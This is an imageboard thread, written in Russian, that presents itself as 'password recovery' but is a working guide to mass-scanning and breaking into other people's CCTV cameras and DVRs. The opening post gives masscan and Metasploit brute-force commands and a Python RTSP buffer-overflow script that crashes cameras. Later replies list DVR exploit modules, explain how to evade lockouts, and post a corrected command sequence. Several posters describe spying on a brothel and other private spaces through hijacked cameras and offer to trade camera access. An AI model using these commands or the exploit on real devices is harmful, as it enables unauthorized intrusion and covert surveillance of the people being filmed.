/web/ - Восстановление паролей видеорегистраторов и IP камер CCTV на простые пароли

Восстановление паролей видеорегистраторов и IP камер CCTV на простые пароли Аноним 06/08/16 Суб 21:38:11 №95128

В этом треде восстанавливаем пароли видеорегистраторов и IP камер CCTV

Нам понадобиться:
Kali Linux
https://www.kali.org/downloads/

Или PentestBox with Metasploit для Windows
https://pentestbox.org

ПО для просмотра на Андроиде, Винде, Маке и т.д.
http://www.cctvcamerapros.com/Viewtron-Video-Surveillance-DVR-s/654.htm#software

1) Качается IP_CIDR блоки
http://www.ipaddresslocation.org/ip_ranges/get_ranges.php
Для своей страны

или создаем с помощью Masscan список IP адресов.

masscan --ports 5920 -iL IPrange.txt --rate=50000 -oX CCTV.xml

Фильтруем онлайн все IP из текста

http://www.toolsvoid.com/extract-ip-addresses

Удаляем онлайн дубликаты

http://www.toolsvoid.com/duplicate-lines-remover

2) Запускаем Метасплоит под виндой или линуксом

msfconsole

3) сохраняем лог

pool /root/cctv.log

4) Выбираем модуль

use auxiliary/scanner/misc/cctv_dvr_login

5) Смотрим его опции

show options

6) Указываем путь к файлу CIDR блоков (тогда Метасплоит будет искать все сам) или путь к IP с уже готовыми адресами

set RHOSTS file:/opt/Country/UA_IP_CCTV.txt

7) Указывает смотреть все пары

set DB_ALL_CREDS true

8) Указываем колличество потоков

set THREADS 4

(выбирайте столько, каков ваш пинг в те адреса, можно вообще 1 поставить)

9) Запускаем

exploit

) Можно указывать любой порт (даже от HikkVision)
) Где находятся логины и пароли - смотрим в настройках

!) Один украинский фашист репортит камеры Донецка и Луганска, а так же России. Я недавно наткнулся на его кукарек обиженки в группах Метасплоита. Поэтому камерами не ДЕЛИМСЯ !!!

В подарок каждому Python-скрипт для вывода из строя почти любой камеры, выпущенной до 2016 года, путем перегрузки буфера, в тригер пакетах можете писать исполнение любого бинарного файла, у которого у камеры есть доступ

import socket

HOST = 'здесь IP адрес'
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

trigger_pkt = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST
trigger_pkt += "CSeq: 7\r\n"
trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n"

s.sendall(trigger_pkt)
print "Packet sent"
data = s.recv(1024)
print 'Received', repr(data), "\r\n"
s.close()

Аноним 06/08/16 Суб 21:50:25 №95129

https://chrome.google.com/webstore/detail/cctv-view/oajmcmcpiboagipoflploplebgicaadj?hl=en

Аноним 06/08/16 Суб 21:52:38 №95130

В настоящий момент есть модули для следующих DVR

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/gather/avtech744_dvr_accounts normal AVTECH 744 DVR Account Information Retrieval
auxiliary/scanner/misc/cctv_dvr_login normal CCTV DVR Login Scanning Utility
auxiliary/scanner/misc/dahua_dvr_auth_bypass normal Dahua DVR Auth Bypass Scanner
auxiliary/scanner/misc/dvr_config_disclosure normal Multiple DVR Manufacturers Configuration Disclosure
auxiliary/scanner/misc/raysharp_dvr_passwords normal Ray Sharp DVR Password Retriever
exploit/linux/misc/hikvision_rtsp_bof 2014-11-19 normal Hikvision DVR RTSP Request Remote Code Execution

Аноним 06/08/16 Суб 21:55:23 №95131

Если будет настроение создам для каждого брутера свой тред. В наличии есть 5 великолепных брутов, один из которых универсальный.

Аноним 07/08/16 Вск 00:33:00 №95138

Masscan - единственная доверенная сборка под Винду от команды Пентестбоx

https://github.com/PentestBox/masscan/blob/master/masscan.exe

Сборка дает на Винде такую же скорость, как на Линуксе

Аноним 08/08/16 Пнд 00:40:18 №95156

Годно

Аноним 08/08/16 Пнд 12:20:09 №95168

Внимание всем:

Dahua нельзя брутить! После 5 неудачных попыток устройство добавляет тебя в черный лист НАВСЕГДА по MAC и подсети IP! Можно попросить показать хэши паролей и потом на локальной машине подбирать.

Аноним 09/08/16 Втр 02:07:35 №95198

Аноним 09/08/16 Втр 02:42:34 №95200

квартирка шлюх

Аноним 09/08/16 Втр 02:44:56 №95201

1000 рублей - час
звук

Аноним 09/08/16 Втр 02:46:30 №95202

Радует, что этот тип камер при бруте банит тебя и пароль админа выпросить нельзя, только восстановить хэши. Что отобьет сразу каклопидоров и толпы ньюфагов + у админ только локальный, оператор не может сменить себе пароль.

Аноним 09/08/16 Втр 03:08:28 №95203

По моральным причинам, остальные 6 камер показывать не буду, сутенер приносит им еду в 12 часов, они хавают, дальше приходят клиенты.

Аноним 09/08/16 Втр 03:08:49 №95204

Аноним 09/08/16 Втр 03:09:10 №95205

Аноним 09/08/16 Втр 03:09:59 №95206

За 1000 рублей, девка танцует, ебется, сосет, шутить, составляет досуг. Одна даже курить кальян во время ебли.

Аноним 09/08/16 Втр 03:10:20 №95207

Аноним 09/08/16 Втр 03:10:39 №95208

Аноним 09/08/16 Втр 03:11:59 №95209

Киев невер слип

Аноним 09/08/16 Втр 05:54:10 №95210

>>95128 (OP)
почему вы перекатились из набегача и почему мачак потер набигач?

Аноним 09/08/16 Втр 13:46:42 №95215

>>95210
Лол. Ты в анабиозе был последние пару лет?

Аноним 09/08/16 Втр 19:31:48 №95222

>>95215
не слежу просто

Аноним 10/08/16 Срд 16:11:23 №95243

>>95128 (OP)
>Указываем путь к файлу CIDR блоков

Вот тут у меня проблема, он не видит файл. Если задавать отдельные адреса/диапазоны - все ок. А указываю расположение файла - он выдает ошибку.

Аноним 10/08/16 Срд 17:35:49 №95245

>>95243
Все, проблемы нет, разобрался.

Аноним 10/08/16 Срд 22:18:54 №95251

>>95202
>при бруте банит тебя
Как тогда брутить?(((

Аноним 11/08/16 Чтв 04:40:46 №95257

>>95251
Никак. Запросить хэш пароля у камеры, если она его отдаст, искать хэш в словаре дома.

Аноним 11/08/16 Чтв 04:43:07 №95258

>>95251

у ССTV можешь брутить по маленькому словарю, после 256 попыток, CCTV добавляет в бан по МАКу и подсети.

У Dahua 5 попыток и бан.

Аноним 11/08/16 Чтв 10:29:55 №95259

А если дать Метасплойту отсканить самому, он будет делать это через Масскан или другую приблуду？Kali linux если что.

Аноним 11/08/16 Чтв 14:35:17 №95276

>>95259
Он будет делать это через nmap
Можешь конечно

Аноним 11/08/16 Чтв 14:37:14 №95277

>>95259
Осваивай уязвимости, вместо брута + есть платная версия метасплоита, там гораздо больше модулей и действий.

Аноним 12/08/16 Птн 19:11:12 №95312

> 8) Указываем колличество потоков
> set THREADS 4
> (выбирайте столько, каков ваш пинг в те адреса, можно вообще 1 поставить)
Прриграл с дебила

Аноним 12/08/16 Птн 22:33:16 №95322

>>95312
Даун не знает про DB_ERROR и колличество потоков, но зато как понтуется.

ТЫ откуда такой вылез?

Аноним 13/08/16 Суб 03:00:43 №95328

Там телнет есть на камерах?

Аноним 13/08/16 Суб 08:22:35 №95332

>>95328
в 30% да + один и тот же логин и пароль в зависимости от производителя.

Аноним 13/08/16 Суб 14:37:09 №95340

>>95332
В остальных 70% его вообще нет в прошивке или просто не запущен?

Аноним 13/08/16 Суб 15:35:06 №95346

>>95340
Не запущен, он есть в 100% DVR

Аноним 13/08/16 Суб 15:37:22 №95347

>>95340
В прошивках старше 2014 антибрут на телнете тоже, после 5 попыток у Дахуя ты не сможешь больше брутить телнет, тайм аут 24 часа, а если будешь пытаться брутить в этот период - полный бан по маку и твоей подсети.

Аноним 13/08/16 Суб 15:39:32 №95348

+ есть еще умная система - защита от дурака, если ты будешь пытаться брутить локальные логины (не буду писать какие они для каждой камеры) - ты через 5 попыток ловишь бан навсегда.

Кстати, это ахуенная тема, что у привилигированного юзера есть вход только с локалки, а удаленка - только у оператора (и поменять пароли нельзя через интернет)

Аноним 18/08/16 Чтв 03:51:06 №95464

>>95347
>полный бан по маку
Мак адрес - это канальный уровень, он в ip-пакетах не передаётся
>и твоей подсети.
у меня много проксей, лул.
Да и брудить я буду только те, на которых не отработают експлоиты.

Аноним 19/08/16 Птн 08:07:16 №95487

>>95203
Можешь видео запилить?

Аноним 19/08/16 Птн 16:36:42 №95497

http://javascript.ru/unsorted/ID

Ты слишком молод, и не знаешь, что Мак ОС отдаст и явасриптом даже. Подними сам свой NVR-сервер, попробуй побрутить метсплоитом и без стеснений покажи лог.

Не удивляйся, если в момент подключения метасплоитом, разрядность системы будет тоже передаваться.

Аноним 19/08/16 Птн 16:37:50 №95498

>>95464
Не, ну че, можешь через веб-форму брутить, тоже с 5 раз )))

Аноним 19/08/16 Птн 16:38:49 №95499

>>95487
Кому и Зачем?

Аноним 19/08/16 Птн 16:42:50 №95500

>>95464
>у меня много проксей, лул.

Когда у тебя будет внезапно все превращаться в

TimeOut

Крокодильи слезки не лей тут.

Аноним 19/08/16 Птн 18:52:21 №95503

>>95497
>что Мак ОС отдаст и явасриптом даже
>http://javascript.ru/unsorted/ID
Ой, кажется ты обкакунькался.
>подними сам свой NVR-сервер, попробуй побрутить метсплоитом и без стеснений покажи лог.
Грамотные люди пишут брут сами себе. Причем наиболее эффективно перебирать не пароли, а ип-адреса камер, т.е. берётся допустим пара admin//admin и список из 1кк ипов-камер, далее каждый ип из списка тестируется на эту пару. Потом берется другая пара и тд.

Аноним 19/08/16 Птн 20:41:40 №95505

>>95503
Когда ты станешь взрослым, то поймешь, что такое писать между строк и почему скрипто-дети, вроде тебя, будут еще долго получать нихуя.

>>Грамотные люди пишут брут сами себе
Ну и з 4 года, хоть осилили как билд из соседнего треда на mingw собрать?

Дико проиграл с тебя, малыш.

Аноним 19/08/16 Птн 20:45:45 №95506

>>95503
>>Причем наиболее эффективно перебирать не пароли, а ип-адреса камер, т.е. берётся допустим пара admin//admin и список из 1кк ипов-камер, далее каждый ип из списка тестируется на эту пару. Потом берется другая пара и тд.

set LOGINS
set USERS

Ты не осилил, дальше можно не читать. Но внезапно.

>перебирать не пароли
>допустим пара admin//admin

Удваиваю тебя, чтоб другие тоже посмеялись.

Короче, учишься вводить в линуксе --help
А потом в местасплоите SHOW OPTIONS и SHOW ACTIONS

Когда осилишь, берешь молоток и ебашишь себя по черепу.

Аноним 19/08/16 Птн 20:49:15 №95507

>>95503
14705086921141.png

Понимаю, что ты не видишь и для тежело в English, но ты старайся.

>>95128 (OP)
Саморазвитие. для тебя сейчас очень важно, а то работать продавцом в Пятерочке уже нависла для тебя, мамкин хацкер.

Аноним 20/08/16 Суб 04:29:31 №95514

Смотрите, что нашел. Бентли с 999 номером.

Аноним 20/08/16 Суб 12:51:31 №95522

>>95514
Не благодари.
"Антипаркон бот"

Аноним 21/08/16 Вск 07:25:05 №95550

>>95499
Хочу посмотреть как клиентов страпонят.

Аноним 14/09/16 Срд 16:41:28 №96183

>>>>Предлагает ставить Kali Linux

Дальше без комментарией. Такая дикая жирнота.

Аноним 26/11/16 Суб 22:16:14 №98413

8787878787.webm (22649Кб, 960x480, 00:01:23)

Аноним 13/01/17 Птн 20:38:03 №99851

>>95128 (OP)
Автор отпиши [email protected], есть дело.

Аноним 13/01/17 Птн 22:49:30 №99854

>>98413
ооо, знаю эту камеру, жаль только что она слетела с того айпишника, а снова она никак не попадается в мои сети, но нечего, страна не очень большая, попадется рано или поздно

Аноним 15/01/17 Вск 11:57:48 №99897

>>95128 (OP)
>Нам понадобиться:
>Kali Linux
>Или PentestBox with Metasploit для Windows
Зачем нужен этот Kali Linux? Кому надо сами установят Metasploit Framework. Раньше был ZverCD теперь Kali Linux, пиздец. Для Windows он готовый есть http://windows.metasploit.com/metasploitframework-latest.msi без всяких Pentest Box.
>ПО для просмотра на Андроиде, Винде, Маке и т.д.
И где твое ПО? http://vmddns.com/download/VMDVR_VMCMS_1.0.0.32.exe — не удается получить доступ к сайту.
>Для своей страны
А не для своей страны нельзя?
>Фильтруем онлайн все IP из текста
Уноси это говно обратно. Не работает с большими объемами данных. Знающие делают так grep -E -o "([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])" myscan.txt > IP.txt
>pool /root/cctv.log
Две ошибки. Не pool а spool, путь до файла должен быть заключен в одинарные кавычки spool 'C:\metasploit-framework\bin\console.log'
>set RHOSTS file:/opt/Country/UA_IP_CCTV.txt
Аналогично сказанному. Путь до файла должен быть заключен в одинарные кавычки.
>(выбирайте столько, каков ваш пинг в те адреса, можно вообще 1 поставить)
Ты че ебанутый?! У меня 10000 IP я их что все пинговать буду? А когда выяснится что пинг до всех разный тогда что? Ебать дебил…
>exploit
Нет. run

Вот такие долбаебы создают треды.

Чтобы модуль auxiliary/scanner/misc/cctv_dvr_login нормально работал в Metasploit Framework под Windows:

spool 'C:\metasploit-framework\bin\console.log'
use auxiliary/scanner/misc/cctv_dvr_login
set BLANK_PASSWORDS true
set DB_ALL_PASS true
set DB_ALL_USERS true
set RHOSTS file:'C:\metasploit-framework\bin\IP.txt'
set THREADS 16
run

Аноним 17/01/17 Втр 22:17:41 №99968

>>99854
нашел ее вновь >>98413
могу поменятся

Аноним 19/01/17 Чтв 13:05:48 №100014

>>Зачем нужен этот Kali Linux
>>Раньше был ZverCD теперь Kali Linux
>>Для Windows
>>Metasploit
>>Windows
>>ZverCD
>>Metasploit
>>ZverCD

Давно так не смеялся. Этот школьник даже сможет в 10 класс перейти.

Аноним 19/01/17 Чтв 13:07:43 №100015

>>ZverCD - мультизагрузочный диск, предназначенный для установки Windows XP SP3
>>Раньше был ZverCD теперь Kali Linux
>>Раньше был ZverCD теперь Kali Linux
>>Раньше был ZverCD теперь Kali Linux
>>Раньше был ZverCD теперь Kali Linux
>>Раньше был ZverCD теперь Kali Linux

Зачем я зашел в этот тред, блять пристрелите этого дебила кто-то.

Аноним 22/01/17 Вск 22:26:14 №100088

>>100015 >>100015
Здарова Аноно, с тобой можно как нибудь связаться.

Аноним 23/01/17 Пнд 14:45:25 №100112

>>100088
Можно. Мой email: [email protected].

Опции
Имя
Тема
Пост	[S] 15000

	Sage Ватермарка Мод тег ОП треда
Файлы	Макс объем: 40Mб, макс кол-во файлов: 4 Кликни/Брось файл/ctrl-v
Captcha

Перед отправкой сообщения прочтите FAQ, FAQ раздела и правила раздела. vk.com/ru2ch - оФФициальная группа VK 2channel.hk - Пасскодач